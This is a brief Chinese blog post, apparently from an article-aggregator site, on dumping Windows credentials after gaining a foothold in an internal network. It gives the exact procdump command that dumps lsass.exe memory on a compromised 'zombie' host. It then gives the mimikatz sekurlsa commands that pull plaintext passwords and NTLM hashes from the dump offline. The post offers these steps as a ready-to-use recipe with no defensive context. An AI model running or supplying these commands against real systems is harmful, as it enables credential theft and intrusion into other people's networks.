美文网首页
内网密码信息收集之procdump

内网密码信息收集之procdump

作者: q1ya | 来源:发表于2020-01-13 12:07 被阅读0次

1、procdump

上传procdump.exe从lsass.exe获取密码文件,在 lsass.exe 里并不是只存有 lm hash 和 ntlm hash 而已应该还存在有你的明文密码经过某种加密算法 (注意: 是加密算法 而不是hash算法 加密算法是可逆的 hash算法是不可逆的)

2、dump密码文件的命令

在肉鸡上执行procdump64.exe -accepteula -ma lsass.exe lsass.dmp 注意64位32位

3、下载密码文件到本地密码文件结合mimikatz解密获取密码

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

相关文章

  • 内网密码信息收集之procdump

    1、procdump 上传procdump.exe从lsass.exe获取密码文件,在 lsass.exe 里并不...

  • 内网密码信息收集之mimikatz

    一、mimikatz结合procdump破解密码 mimikatz.exe "sekurlsa::minidump...

  • 内网渗透之信息收集

    0x01 whoami /user && whoami /priv 查看当前用户名&&查看当前用户特权名(查看当前...

  • 每日安全资讯(2020-07-27)

    内网信息收集与上传下载可以说内网渗透测试,其本质就是信息收集。信息收集的深度,直接关系到内网渗透测试的成败。当你拿...

  • 内网信息收集

    总结下内网信息收集时用到的方法,由于是想到什么写什么,所以文章比较混乱..... 一、Windows cmd命令 ...

  • 内网信息收集

    通常当我们拿下一台主机之后,我们的目的是内网横向渗透,在这个过程中必不可少的一项就是信息收集,信息收集的越全面,往...

  • 内网渗透-信息收集

    00 信息收集的方向 主机存活探测 主机端口开放情况 主机服务探测 主机操作系统探测 网段分布情况 漏洞信息探测 ...

  • 内网信息收集常用方法

    1 主机信息收集常用工具 PowerView.ps1: windows内网收集powershell工具https:...

  • 内网信息收集关键点

    1 主机信息收集关键点 主机名---------------------------------------hos...

  • 内网渗透-域信息收集

    信任域查询:查询某域控的信任域:nltest /domain_trusts /all_trusts /v /ser...

网友评论

      本文标题:内网密码信息收集之procdump

      本文链接:https://www.haomeiwen.com/subject/hjvgactx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|内网密码信息收集之procdump|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!